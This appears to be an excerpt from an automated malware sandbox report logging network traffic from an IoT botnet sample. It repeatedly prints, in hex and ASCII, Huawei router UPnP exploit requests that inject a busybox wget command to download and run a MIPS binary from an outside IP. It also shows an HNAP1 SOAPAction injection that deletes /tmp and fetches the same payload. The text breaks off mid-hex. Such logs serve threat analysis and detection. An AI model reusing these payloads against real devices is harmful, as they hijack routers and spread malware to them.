77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 